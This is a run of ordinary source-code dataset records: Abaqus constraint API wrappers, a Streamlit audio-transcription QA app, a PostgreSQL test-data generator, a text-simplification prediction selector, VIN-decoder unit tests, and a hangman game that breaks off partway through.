1-direction is\n constrained to the reference node for a kinematic coupling constraint. The default value\n is ON.The **ur1** argument applies only when **couplingType** = KINEMATIC.\n ur2\n A Boolean specifying if the rotational displacement component about the 2-direction is\n constrained to the reference node for a kinematic coupling constraint. The default value\n is ON.The **ur2** argument applies only when **couplingType** = KINEMATIC.\n ur3\n A Boolean specifying if the rotational displacement component about the 3-direction is\n constrained to the reference node for a kinematic coupling constraint. The default value\n is ON.The **ur3** argument applies only when **couplingType** = KINEMATIC.\n weightingMethod\n A SymbolicConstant specifying an optional weighting method used for calculating the\n distributing weight factors. Possible values are UNIFORM, LINEAR, QUADRATIC, and CUBIC.\n The default value is UNIFORM.The **weightingMethod** argument applies only when\n **couplingType** = DISTRIBUTING.\n alpha\n A Float specifying the value of the thermal expansion coefficient. The default value is 0.0.\n The alpha argument applies only when couplingType=KINEMATIC.\n\n .. versionadded:: 2022\n The ``alpha`` argument was added.\n\n Returns\n -------\n Coupling\n A Coupling object.\n \"\"\"\n self.constraints[name] = constraint = Coupling(\n name,\n surface,\n controlPoint,\n influenceRadius,\n couplingType,\n adjust,\n localCsys,\n u1,\n u2,\n u3,\n ur1,\n ur2,\n ur3,\n weightingMethod,\n alpha,\n )\n return constraint\n\n @abaqus_method_doc\n def DisplayBody(self, name: str, instance: PartInstance, controlPoints: ModelDotArray) -> DisplayBody:\n \"\"\"This method creates a DisplayBody object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].DisplayBody\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n instance\n A PartInstance object specifying the part instance that is to be used for display only.\n controlPoints\n A ModelDotArray object specifying the motion of the PartInstance. The control points may\n be ConstrainedSketchVertex, ReferencePoint, or MeshNode objects. Their motion will control the motion of\n the PartInstance. If this argument is set to an empty sequence, the PartInstance will\n remain fixed in space during the analysis. The sequence can have either one object or\n three objects.\n\n Returns\n -------\n DisplayBody\n A DisplayBody object.\n \"\"\"\n self.constraints[name] = constraint = DisplayBody(name, instance, controlPoints)\n return constraint\n\n @abaqus_method_doc\n def EmbeddedRegion(\n self,\n name: str,\n embeddedRegion: Region,\n hostRegion: Region,\n weightFactorTolerance: float | None = None,\n toleranceMethod: Literal[C.FRACTIONAL, C.BOTH, C.ABSOLUTE] = BOTH,\n absoluteTolerance: float = 0,\n fractionalTolerance: float = 0,\n ) -> EmbeddedRegion:\n \"\"\"This method creates a EmbeddedRegion object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].EmbeddedRegion\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n embeddedRegion\n A Region object specifying the body region to be embedded.\n hostRegion\n A Region object specifying the host region. A value of None indicates that the host\n region is the whole model.\n weightFactorTolerance\n A Float specifying a small value below which the weighting factors will be zeroed out.\n The default value is 10⁻⁶.\n toleranceMethod\n A SymbolicConstant specifying the method used to determine the embedded element\n tolerance. Possible values are ABSOLUTE, FRACTIONAL, and BOTH. The default value is\n BOTH.\n absoluteTolerance\n A Float specifying the absolute value by which a node on the embedded region may lie\n outside the host region. If **absoluteTolerance** = 0.0, the **fractionalTolerance** value\n will be used. The default value is 0.0.This argument applies only when\n **toleranceMethod** = ABSOLUTE or BOTH.\n fractionalTolerance\n A Float specifying the fractional value by which a node on the embedded region may lie\n outside the host region. The fractional value is based on the average element size\n within the host region. The default value is 0.05.If both tolerance arguments are\n specified, the smaller value will be used.This argument applies only when\n **toleranceMethod** = FRACTIONAL or BOTH.\n\n Returns\n -------\n EmbeddedRegion\n An EmbeddedRegion object.\n \"\"\"\n self.constraints[name] = constraint = EmbeddedRegion(\n name,\n embeddedRegion,\n hostRegion,\n weightFactorTolerance,\n toleranceMethod,\n absoluteTolerance,\n fractionalTolerance,\n )\n return constraint\n\n @abaqus_method_doc\n def Equation(self, name: str, terms: tuple) -> Equation:\n \"\"\"This method creates an Equation object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].Equation\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n terms\n A sequence of (Float, String, Int, Int) sequences specifying a coefficient, Set name,\n degree of freedom, and coordinate system ID. The coordinate system ID is optional.\n\n Returns\n -------\n Equation\n An Equation object.\n\n Raises\n ------\n Exception\n If **terms** does not contain more than one entry, Equation must have two or more terms.\n \"\"\"\n self.constraints[name] = constraint = Equation(name, terms)\n return constraint\n\n @abaqus_method_doc\n def MultipointConstraint(\n self,\n name: str,\n surface: Region,\n controlPoint: Region,\n mpcType: Literal[C.USER_MPC, C.BEAM_MPC, C.ELBOW_MPC, C.TIE_MPC, C.MPC, C.PIN_MPC, C.LINK_MPC],\n csys: str | None = None,\n userType: int = 0,\n userMode: Literal[C.DOF_MODE_MPC, C.USER_MPC, C.NODE_MODE_MPC] = DOF_MODE_MPC,\n ) -> MultipointConstraint:\n \"\"\"This method creates a MultipointConstraint object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].MultipointConstraint\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n surface\n A Region object specifying the surface on which the MultipointConstraint nodes are\n located.\n controlPoint\n A Region object specifying the constraint control point.\n mpcType\n A SymbolicConstant specifying the MPC type of the constraint. Possible values are\n BEAM_MPC, ELBOW_MPC, PIN_MPC, LINK_MPC, TIE_MPC, and USER_MPC.\n csys\n None or a DatumCsys object specifying the initial orientation of the local coordinate\n system for the MultipointConstraint's degrees of freedom. If **localCsys** = None, the\n MultipointConstraint is defined in the global coordinate system. The default value is\n None.\n userType\n An Int specifying to differentiate between different constraint types in a user-defined\n MultipointConstraint. The default value is 0.The **userType** argument applies only when\n **mpcType** = USER_MPC.\n userMode\n A SymbolicConstant specifying the mode of the constraint when it is user-defined.\n Possible values are DOF_MODE_MPC and NODE_MODE_MPC. The default value is\n DOF_MODE_MPC.The **userMode** argument applies only when **mpcType** = USER_MPC.\n\n Returns\n -------\n MultipointConstraint\n A MultipointConstraint object.\n \"\"\"\n self.constraints[name] = constraint = MultipointConstraint(\n name, surface, controlPoint, mpcType, csys, userType, userMode\n )\n return constraint\n\n @abaqus_method_doc\n def RigidBody(\n self,\n name: str,\n refPointRegion: Region,\n bodyRegion: str | None = None,\n tieRegion: str | None = None,\n pinRegion: str | None = None,\n surfaceRegion: str | None = None,\n refPointAtCOM: Boolean = OFF,\n isothermal: Boolean = OFF,\n ) -> RigidBody:\n \"\"\"This method creates a RigidBody object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].RigidBody\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n refPointRegion\n A Region object specifying the reference point.\n bodyRegion\n None or a Region object specifying the elements constrained to the movement of the\n reference point. The default value is None.\n tieRegion\n None or a Region object specifying the nodes tied to the movement of the reference\n point. The default value is None.\n pinRegion\n None or a Region object specifying the nodes pinned to the movement of the reference\n point. The default value is None.\n surfaceRegion\n None or a Region object specifying the analytic surface constrained to the movement of\n the reference point. The default value is None.\n refPointAtCOM\n A Boolean specifying whether the analysis product should recompute the reference point\n position to be at the center of mass. The default value is OFF.\n isothermal\n A Boolean specifying whether the temperature degree of freedom should be constrained.\n The default value is OFF.\n\n Returns\n -------\n RigidBody\n A RigidBody object.\n \"\"\"\n self.constraints[name] = constraint = RigidBody(\n name,\n refPointRegion,\n bodyRegion,\n tieRegion,\n pinRegion,\n surfaceRegion,\n refPointAtCOM,\n isothermal,\n )\n return constraint\n\n @abaqus_method_doc\n def ShellSolidCoupling(\n self,\n name: str,\n shellEdge: Region,\n solidFace: Region,\n positionToleranceMethod: Literal[C.COMPUTED, C.SPECIFIED] = COMPUTED,\n positionTolerance: float = 0,\n influenceDistanceMethod: Literal[C.DEFAULT, C.SPECIFIED] = DEFAULT,\n influenceDistance: float = 0,\n ) -> ShellSolidCoupling:\n \"\"\"This method creates a ShellSolidCoupling object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].ShellSolidCoupling\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n shellEdge\n A Region object specifying the name of the shell edge surface.\n solidFace\n A Region object specifying the name of the solid surface.\n positionToleranceMethod\n A SymbolicConstant specifying the method used to determine the position tolerance.\n Possible values are COMPUTED and SPECIFIED. The default value is COMPUTED.\n positionTolerance\n A Float specifying the position tolerance. The default value is 0.0.The\n **positionTolerance** argument applies only when\n **positionToleranceMethod** = SPECIFIED. Note: Abaqus will not constrain nodes on the solid\n face region outside the position tolerance.\n influenceDistanceMethod\n A SymbolicConstant specifying the method used to determine the influence distance.\n Possible values are DEFAULT and SPECIFIED. The default value is DEFAULT.\n influenceDistance\n A Float specifying the influence distance. The **influenceDistance** argument applies only\n when **influenceDistanceMethod** = SPECIFIED. The default value is 0.0.\n\n Returns\n -------\n ShellSolidCoupling\n A ShellSolidCoupling object.\n \"\"\"\n self.constraints[name] = constraint = ShellSolidCoupling(\n name,\n shellEdge,\n solidFace,\n positionToleranceMethod,\n positionTolerance,\n influenceDistanceMethod,\n influenceDistance,\n )\n return constraint\n\n @abaqus_method_doc\n def Tie(\n self,\n name: str,\n main: Region,\n secondary: Region,\n adjust: Boolean = ON,\n positionToleranceMethod: Literal[C.COMPUTED, C.SPECIFIED] = COMPUTED,\n positionTolerance: float = 0,\n tieRotations: Boolean = ON,\n constraintRatioMethod: Literal[C.DEFAULT, C.SPECIFIED] = DEFAULT,\n constraintRatio: float = 0,\n constraintEnforcement: Literal[C.NODE_TO_SURFACE, C.SOLVER_DEFAULT, C.SURFACE_TO_SURFACE] = SOLVER_DEFAULT,\n thickness: Boolean = ON,\n ) -> Tie:\n \"\"\"This method creates a Tie object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].Tie\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n\n .. versionchanged:: 2022\n The ``master`` argument was renamed to ``main``.\n main\n A Region object specifying the name of the main surface.\n\n .. versionchanged:: 2022\n The ``slave`` argument was renamed to ``secondary``.\n secondary\n A Region object specifying the name of the secondary surface.\n adjust\n A Boolean specifying whether initial positions of tied secondary nodes are adjusted to\n lie on the main surface. The default value is ON.\n positionToleranceMethod\n A SymbolicConstant specifying the method used to determine the position tolerance.\n Possible values are COMPUTED and SPECIFIED. The default value is COMPUTED.\n positionTolerance\n A Float specifying the position tolerance. The **positionTolerance** argument applies only\n when **positionToleranceMethod** = SPECIFIED. The default value is 0.0.\n tieRotations\n A Boolean specifying whether rotation degrees of freedom should be tied. The default\n value is ON.\n constraintRatioMethod\n A SymbolicConstant specifying the method used to determine the constraint ratio.\n Possible values are DEFAULT and SPECIFIED. The default value is DEFAULT.\n constraintRatio\n A Float specifying the fractional distance between the main reference surface and the\n secondary node at which the translational constraint should act. The **constraintRatio**\n argument applies only when **constraintRatioMethod** = SPECIFIED. The default value is 0.0.\n constraintEnforcement\n A SymbolicConstant specifying the discretization method. Possible values are\n SOLVER_DEFAULT, NODE_TO_SURFACE, and SURFACE_TO_SURFACE. The default value is\n SOLVER_DEFAULT.\n thickness\n A Boolean specifying whether shell element thickness is considered. The default value is\n ON.\n\n Returns\n -------\n Tie\n A Tie object.\n \"\"\"\n self.constraints[name] = constraint = Tie(\n name,\n main,\n secondary,\n adjust,\n positionToleranceMethod,\n positionTolerance,\n tieRotations,\n constraintRatioMethod,\n constraintRatio,\n constraintEnforcement,\n thickness,\n )\n return constraint\n","repo_name":"haiiliin/abqpy","sub_path":"src/abaqus/Constraint/ConstraintModel.py","file_name":"ConstraintModel.py","file_ext":"py","file_size_in_byte":21430,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"29"} +{"seq_id":"10118580895","text":"import os\nimport streamlit as st\nfrom app import AudioTranscription\n\ndef main():\n\n st.header(\"MVP - Quality Assurance\")\n\n # Upload button\n audio_file = st.file_uploader(\"Upload Audio File\", type=[\"mp3\", \"wav\"])\n\n if audio_file:\n # Process the uploaded audio file\n file_name = os.path.splitext(os.path.basename(audio_file.name))[0]\n audio_transcription = AudioTranscription(audio_file, file_name)\n\n transcript_text = \"\"\n\n # Transcribe and save\n with st.spinner(\"Transcribing audio...\"):\n transcript_text = audio_transcription.transcribe()\n\n # Display the transcription\n st.subheader(\"Transcription\")\n # st.text_area(\"transcript\", value=transcript_text, key=\"transcript_text\", height=800)\n st.text_area(\"transcript\", value=transcript_text, key=\"transcript_text\")\n\n # Show \"Send for Review\" button when transcription is done\n if transcript_text:\n if st.button(\"Send for Review\"):\n # Start the loading spinner\n with st.spinner(\"Reviewing audio...\"):\n classification = audio_transcription.classify_call()\n data = audio_transcription.extract_data()\n review_text, score, status = audio_transcription.qa_review() # Call the function to submit the review\n\n # Display the returned review\n # st.subheader(\"Review\")\n # st.text_area(\"Review Text\", value=review_text, key=\"review_text\")\n st.subheader(\"QA Review\")\n calltype, source = classification.split(\":\")\n\n call_data = \"Calltype: \" + calltype.strip() + \"\\n\" + \"Source: \" + source + \"\\n\" + \"QA comment: \" + status + \"ed \\n\\n\\n\"\n\n data += \"\\n\\n\"\n\n # st.write(call_data + data)\n\n st.text_area(\"review\", value=(call_data + data + review_text), height = 1000)\n\n\n if status == \"Pass\":\n st.success(str(score) + \"\\t\" + status, icon=\"✅\") # Display success message\n if status == \"Fail\":\n st.error(str(score) + \"\\t\" + status, icon=\"❌\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Lord-Haji/MVP-QA","sub_path":"streamlit-old.py","file_name":"streamlit-old.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2472882595","text":"import random\nimport psycopg2\n\ndef random_gen(id):\n modelId = random.randint(1, 4)\n pageNumber = random.randint(0, 300)\n xCoord = random.randint(0, 500)\n yCoord = random.randint(0, 1000)\n width = random.randint(0, 500)\n height = width // 2\n modelPlacingId = id\n price = random.randint(1000, 5000)\n payment = False\n chosenByUser = False\n randomBool = random.randint(0, 1)\n if randomBool == 0:\n chosenByUser = False\n else:\n chosenByUser = True\n if chosenByUser == True:\n randomBool = random.randint(0, 1)\n if randomBool == 0:\n payment = False\n else:\n payment = True\n statusPart1 = \"Not accepted\"\n if chosenByUser == True:\n statusPart1 = \"Accepted\"\n statusPart2 = \"not paid\"\n if payment == True:\n statusPart2 = \"paid\"\n status = statusPart1 + \" and \" + statusPart2\n return {\n \"modelId\": modelId, \"pageNumber\": pageNumber, \"xCoord\": xCoord, \"yCoord\": yCoord, \"width\": width, \"height\": height, \"modelPlacingId\": modelPlacingId, \"price\": price, \"payment\": payment,\n \"status\": status, \"chosenByUser\": chosenByUser\n\n }\n\ndef select_filtered_values1():\n conn = psycopg2.connect(dbname='postgres', user='postgres', password='06012002', host='localhost')\n rows = []\n for i in range(0, 100000):\n args = random_gen(i + 1)\n with conn.cursor() as cursor:\n cursor.execute(\n '''INSERT INTO \"public.ModelPlacing\" (\"modelId\", \"pageNumber\", \"xCoord\", \"yCoord\", \"width\", \"height\", \"price\", \"payment\", \"status\", \"chosenByUser\") VALUES(%s,%s,%s,%s,%s,%s,%s,%s,'%s',%s)''' % (\n str(args[\"modelId\"]), str(args[\"pageNumber\"]), str(args[\"xCoord\"]), str(args[\"yCoord\"]),\n str(args[\"width\"]), str(args[\"height\"]), str(args[\"price\"]), str(args[\"payment\"]),\n str(args[\"status\"]),\n str(args[\"chosenByUser\"])))\n conn.commit()\n conn.close()\n #rows = cursor.fetchall()\n #return rows\n\ndef select_filtered_values2():\n conn = psycopg2.connect(dbname='architecture2', user='postgres', password='06012002', host='localhost')\n rows = []\n price_arr = []\n for i in range(0, 50000):\n args = random_gen(i + 1)\n with conn.cursor() as cursor:\n cursor.execute(\n '''INSERT INTO \"architecture2\".\"ModelPlacing\" (\"pageNumber\", \"xCoord\", \"yCoord\", \"width\", \"height\", \"status\", \"chosenByUser\") VALUES(%s,%s,%s,%s,%s,'%s',%s)''' % (\n str(args[\"pageNumber\"]), str(args[\"xCoord\"]), str(args[\"yCoord\"]),\n str(args[\"width\"]), str(args[\"height\"]), str(args[\"status\"]), str(args[\"chosenByUser\"])))\n\n price_arr.append({\"model_placing_id\": str(i + 1), \"price\": str(args[\"price\"]), \"payment\": str(args[\"payment\"])})\n\n conn.commit()\n conn.close()\n\n conn = psycopg2.connect(dbname='architecture2', user='postgres', password='06012002', host='localhost')\n for i in range(0, 50000):\n with conn.cursor() as cursor:\n cursor.execute(\n '''INSERT INTO \"architecture2\".\"ModelPlacingPayment\" (\"model_placing_id\", \"price\", \"payment\") VALUES(%s,%s,%s)''' % (\n str(i + 1), str(price_arr[i][\"price\"]), str(price_arr[i][\"payment\"])))\n\n conn.commit()\n conn.close()\n\n\n\nif __name__ == \"__main__\":\n select_filtered_values1()\n select_filtered_values2()\n","repo_name":"MykolaOnyshchuk/Lab3-architecture","sub_path":"dataGeneration.py","file_name":"dataGeneration.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5735486754","text":"import json\nimport argparse\nfrom collections import Counter\nimport re\nfrom itertools import zip_longest\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nfrom tqdm.auto import tqdm\nimport torch\nfrom transformers import AutoTokenizer, AutoModel\nfrom rouge import Rouge\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom easse.sari import corpus_sari\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom utils import get_word_tokens, mean_pooling, get_similarities, get_rougel\n\n\nDATA_DIR = Path(\"./data\")\nWIKI_DIR = DATA_DIR / \"WikiSimple-translated\"\nDEV_PATH = DATA_DIR / \"dev_sents.csv\"\nTEST_PATH = DATA_DIR / \"public_test_only.csv\"\n\n\ndef get_preds_df(preds, input_texts):\n preds_df = pd.DataFrame({\"pred\": preds.values.reshape(-1, 1).ravel()})\n preds_df[\"input\"] = np.array([[i] * 5 for i in input_texts]).ravel()\n preds_df[\"pred_len\"] = preds_df[\"pred\"].apply(lambda x: len(get_word_tokens(x)))\n preds_df[\"input_len\"] = preds_df[\"input\"].apply(lambda x: len(get_word_tokens(x)))\n preds_df[\"cosine_sim\"] = preds_df.apply(lambda x: get_similarities(model, tokenizer, x[\"pred\"], x[\"input\"]),\n axis=1)\n preds_df[\"cosine_sim\"] = preds_df[\"cosine_sim\"].apply(lambda x: x[0][0])\n preds_df[\"rouge_l\"] = preds_df.apply(lambda x: get_rougel(x[\"pred\"], x[\"input\"]), axis=1)\n return preds_df\n\n\ndef get_rf_from_dev(dev_df, preds_dev, max_depth=None, random_state=19):\n preds_df = preds_dev.copy()\n dev_df_grouped = dev_df.groupby(\"input\").agg(\n {\"output\": list, \"cosine_sim\": list, \"rouge_l\": list, \"input_len\": max, \"output_len\": list}\n ).reset_index()\n preds_df[\"ref\"] = [l for sublist in dev_df_grouped[\"output\"].apply(lambda x: [x] * 5).tolist() for l in sublist]\n preds_df[\"ref\"] = preds_df[\"ref\"].apply(lambda x: [[i] for i in x])\n\n preds_df[\"pred_len\"] = preds_df[\"pred\"].apply(lambda x: len(get_word_tokens(x)))\n preds_df[\"input_len\"] = preds_df[\"input\"].apply(lambda x: len(get_word_tokens(x)))\n\n preds_df[\"sari\"] = preds_df.apply(\n lambda x: corpus_sari(\n orig_sents=[x[\"input\"]],\n sys_sents=[x[\"pred\"]],\n refs_sents=x[\"ref\"],\n ), axis=1\n )\n \n rf = RandomForestRegressor(n_estimators=1000, max_depth=max_depth, n_jobs=-1, random_state=random_state)\n \n X_train = preds_df[[\"cosine_sim\", \"rouge_l\", \"input_len\", \"pred_len\"]]\n y_train = preds_df[\"sari\"]\n \n rf.fit(X_train, y_train)\n \n return rf, preds_df\n\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\"--input_test_path\", required=True, type=str, default=\"data/public_test_only.csv\")\n argparser.add_argument(\"--input_dev_metrics_path\", required=True, type=str,\n default=\"data/prepared_data/dev_df_metrics.csv\")\n argparser.add_argument(\"--test_predictions_path\", required=True, type=str, default=\"predictions/test_answers_5.csv\")\n argparser.add_argument(\"--dev_predictions_path\", required=True, type=str, default=\"predictions/dev_answers_5.csv\")\n argparser.add_argument(\"--submission_folder\", required=True, type=str, default=\"submissions\")\n argparser.add_argument(\"--seed\", required=True, type=int, default=19)\n args = argparser.parse_args()\n for arg in vars(args):\n print(f\"{arg}: {getattr(args, arg)}\")\n\n tokenizer = AutoTokenizer.from_pretrained(\"sberbank-ai/sbert_large_nlu_ru\")\n model = AutoModel.from_pretrained(\"sberbank-ai/sbert_large_nlu_ru\")\n model.to(\"cuda\")\n\n with open(args.input_test_path) as f:\n test_input = [l.strip() for l in f]\n\n dev_df = pd.read_csv(args.input_dev_metrics_path)\n dev_df_grouped = dev_df.groupby(\"input\").agg(\n {\"output\": list, \"cosine_sim\": list, \"rouge_l\": list, \"input_len\": max, \"output_len\": list}\n ).reset_index()\n dev_input = dev_df_grouped[\"input\"].tolist()\n\n pred_test = pd.read_csv(args.test_predictions_path)\n pred_test = get_preds_df(pred_test, test_input)\n\n preds_dev = pd.read_csv(args.dev_predictions_path)\n preds_dev = get_preds_df(preds_dev, dev_input)\n\n rf, preds_df = get_rf_from_dev(dev_df, preds_dev, max_depth=5, random_state=args.seed)\n\n pred_test[\"sari_pred\"] = rf.predict(pred_test[[\"cosine_sim\", \"rouge_l\", \"input_len\", \"pred_len\"]])\n tmp = pred_test.sort_values([\"input\", \"sari_pred\"], ascending=[True, False])[::5]\n pred_dict = dict(zip(tmp[\"input\"], tmp[\"pred\"]))\n\n predictions = [pred_dict[i] for i in test_input]\n\n submission_folder = Path(args.submission_folder)\n submission_folder.mkdir(exist_ok=True)\n pd.DataFrame(predictions).to_csv(submission_folder / \"answer.csv\", index=False, header=None)\n","repo_name":"InstituteForIndustrialEconomics/DialogueEvaluation21_RuSimpleSentEval","sub_path":"choose_prediction.py","file_name":"choose_prediction.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"23630964687","text":"import unittest\nfrom pyvin import VIN, VINError, DecodedVIN, RAISE, SKIP, PASS\nfrom .vin_samples import (INVALID,\n INVALID_SHORT,\n DECODED_TOYOTA_COROLLA,\n TOYOTA_COROLLA,\n HYUNDAI_ELANTRA,\n BATCH)\n\n\nclass TestPyVin(unittest.TestCase):\n def test_vin_single(self):\n vin = VIN(TOYOTA_COROLLA, error_handling=SKIP)\n self.assertIsInstance(vin, DecodedVIN)\n\n vin = VIN(TOYOTA_COROLLA, error_handling=RAISE)\n self.assertIsInstance(vin, DecodedVIN)\n\n def test_vin_single_invalid(self):\n vins = VIN(INVALID, error_handling=SKIP)\n self.assertEqual(vins, [])\n\n with self.assertRaises(VINError):\n VIN(INVALID, error_handling=RAISE)\n\n def test_vin_single_invalid_short(self):\n vin = VIN(INVALID_SHORT, error_handling=SKIP)\n self.assertEqual(vin, [])\n\n with self.assertRaises(VINError):\n VIN(INVALID_SHORT, error_handling=RAISE)\n\n def test_vin_single_invalid_empty(self):\n vin = VIN('', error_handling=SKIP)\n self.assertEqual(vin, [])\n\n with self.assertRaises(VINError):\n VIN('', error_handling=RAISE)\n\n def test_vin_single_invalid_none(self):\n vin = VIN(None, error_handling=SKIP)\n self.assertEqual(vin, [])\n\n with self.assertRaises(VINError):\n VIN(None, error_handling=RAISE)\n\n def test_vin_multi_minimal(self):\n \"\"\"When multiple vins are input (Iterable or as separate args),\n return a list of decoded vins\n \"\"\"\n samples = (TOYOTA_COROLLA, HYUNDAI_ELANTRA)\n vins = VIN(*samples)\n self.assertEqual(len(samples), len(vins))\n for vin in vins:\n self.assertIsInstance(vin, DecodedVIN)\n\n def test_vin_multi_large_batch(self):\n samples = BATCH\n vins = VIN(*samples)\n self.assertEqual(len(samples), len(vins))\n\n def test_invalid_in_multi(self):\n samples = (INVALID, TOYOTA_COROLLA)\n vins = VIN(*samples)\n self.assertIsInstance(vins, DecodedVIN)\n self.assertEqual(len([x for x in samples if x is not INVALID]), 1)\n\n def test_invalid_in_multi_raise(self):\n samples = (INVALID, TOYOTA_COROLLA)\n with self.assertRaises(VINError):\n VIN(*samples, error_handling=RAISE)\n\n def test_invalid_in_multi_pass(self):\n samples = (INVALID, TOYOTA_COROLLA)\n vins = VIN(*samples, error_handling=PASS)\n self.assertEqual(len(samples),\n len(vins))\n\n def test_vin_attrs(self):\n vin = VIN(TOYOTA_COROLLA)\n attrs = {k: v for k, v in vin.__dict__.items() if '__' not in k}\n self.assertDictEqual(attrs, DECODED_TOYOTA_COROLLA)\n","repo_name":"arpuffer/pyvin","sub_path":"tests/test_pyvin.py","file_name":"test_pyvin.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"29"} +{"seq_id":"41333599223","text":"\"\"\"\nHangman\nCreator: Kian Moloney\n\nThis game is hangman. The game was created using a class. Your job is to guess\nwhat the shown country is by pressing interactive buttons that are shown on\nscreen. If you guess incorrectly a total of 7 times, the game ends. There are\na total of 41 countries that you have to guess from. Use either the drop-down\nmenu or the x-button to exit the game.\n\"\"\"\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom functools import partial\nfrom string import ascii_uppercase\nimport random\n\nWORDLIST = [\"FINLAND\", \"SWEDEN\", \"NORWAY\", \"DENMARK\", \"CHINA\", \"JAPAN\",\n \"INDIA\", \"TURKEY\", \"GERMANY\", \"RUSSIA\", \"POLAND\", \"SPAIN\",\n \"FRANCE\", \"PORTUGAL\", \"EGYPT\", \"ARGENTINA\", \"AMERICA\", \"CANADA\",\n \"GREECE\", \"ITALY\", \"SERBIA\", \"ESTONIA\", \"MEXICO\", \"UKRAINE\",\n \"HUNGARY\", \"ICELAND\", \"LUXEMBOURG\", \"MADAGASCAR\", \"INDONESIA\",\n \"AUSTRALIA\", \"ISRAEL\", \"CHILE\", \"IRELAND\", \"CROATIA\", \"ALBANIA\",\n \"NIGERIA\", \"MAROCCO\", \"SOMALIA\", \"BELGIUM\", \"LATVIA\", \"MALAYSIA\"]\n\n\nclass Hangman:\n def __init__(self):\n \"\"\"\n Constructor that creates all the parts of the GUI and all the\n attributes for the functions, the use of which are explained later.\n \"\"\"\n\n # Create the menu.\n self.__window = Tk()\n self.__window.title(\"Hangman - Guess the Country\")\n\n # Import the photos now that there is a main window.\n self.__photos = [\n PhotoImage(file=\"0.png\"), PhotoImage(file=\"1.png\"),\n PhotoImage(file=\"2.png\"), PhotoImage(file=\"3.png\"),\n PhotoImage(file=\"4.png\"), PhotoImage(file=\"5.png\"),\n PhotoImage(file=\"6.png\"), PhotoImage(file=\"7.png\")\n ]\n\n self.__wrong_guesses = 0\n\n # Create a top menu and cascade a submenu to it containing two buttons.\n top_menu = Menu(self.__window)\n self.__window.configure(menu=top_menu)\n sub_menu = Menu(top_menu, tearoff=False)\n top_menu.add_cascade(menu=sub_menu, label=\"Menu\")\n sub_menu.add_command(label=\"New game\", command=self.new_game)\n sub_menu.add_command(label=\"Quit\", command=self.quit_program)\n\n # Create a Label for the hangman photos and set the default photo.\n self.__hangman_label = Label(self.__window)\n self.__hangman_label.grid(row=0, column=12, columnspan=6, rowspan=7,\n sticky=E, padx=(0, 5))\n self.__hangman_label.configure(image=self.__photos[0])\n\n # Create a Label for the word to be guessed.\n self.__word_label = Label(self.__window)\n self.__word_label.grid(row=12, column=8, columnspan=3, sticky=E+W,\n padx=(10, 0))\n\n # An attribute to help to check if the user won. It is called spaced\n # word, because the selected country is presented to the user with\n # spaces between the letters.\n self.__spaced_word = \"\"\n\n # Make a list where the keyboard buttons can be placed.\n self.__buttons = []\n\n i = 0\n\n # To create the buttons, we first have to go through the letters,\n # so 'range(26)' for the amount of letters.\n for index in range(26):\n # Pick out a letter and make a button for it. The partial is used\n # to make sure an argument can be passed to the guess handler.\n letter = ascii_uppercase[index]\n self.__buttons.append(Button(self.__window, text=letter, font=\n \"Euphemia 10\",\n command=partial(self.guess, letter,\n index)))\n\n # Place the letters using the i variable.\n self.__buttons[index].grid(row=1+i//5, column=i % 5, sticky=E+W)\n i += 1\n\n # Create a 'new game' button beside the Z button.\n self.__new_game = Button(self.__window, text=\"New Game\",\n font=\"Euphemia\", command=self.new_game).grid(\n row=6, column=2,\n columnspan=4,\n sticky=W)\n\n self.new_game()\n\n # Greet the user and tell them how to play.\n self.__welcome_message = messagebox.showinfo(\"Hangman\",\n \"Welcome to Hangman!\\n\"\n \"Your job is to guess \"\n \"the country.\\nYou can \"\n \"answer incorrectly 7 \"\n \"times so make it count!\")\n self.__window.mainloop()\n\n def new_game(self):\n \"\"\"\n Start a new game, so in other words reset the buttons, get a new word,\n replace the old with the new one (unless it's the first game),\n and reset the wrong guesses.\n \"\"\"\n\n # Reset the amount of wrong guesses.\n self.__wrong_guesses = 0\n\n # Reset the image and buttons.\n self.__hangman_label.configure(image=self.__photos[0])\n for index in range(25):\n self.__buttons[index].configure(state=NORMAL)\n\n # Select a word out of the 41 countries.\n random_index = random.randint(0, 40)\n selected_word = WORDLIST[random_index]\n\n # Create spaces between the letters of the word and replace the letters\n # with underscores.\n self.__word_label.configure(text=\" \".join(\"_\" * len(selected_word)),\n font=\"Euphemia 14\")\n\n # Configure the spaced word for the guess method, so that it can make\n # it into a list, and use it to check if the user won.\n self.__spaced_word = \" \".join(selected_word)\n\n def quit_program(self):\n \"\"\"\n Simple exit function, incase the user wants to exit using the 'Quit'\n button.\n \"\"\"\n\n # Show a messagebox and destroy the window.\n messagebox.showinfo(\"Hangman - Guess the Country\",\n \"Thanks for playing!\")\n self.__window.destroy()\n\n def guess(self, letter, index):\n \"\"\"\n When a button is pressed, this method is called. This methods job\n consists of disabling the button, and if guessed correctly, checking\n if won and replacing underscores with letters. Also it changes the\n picture of 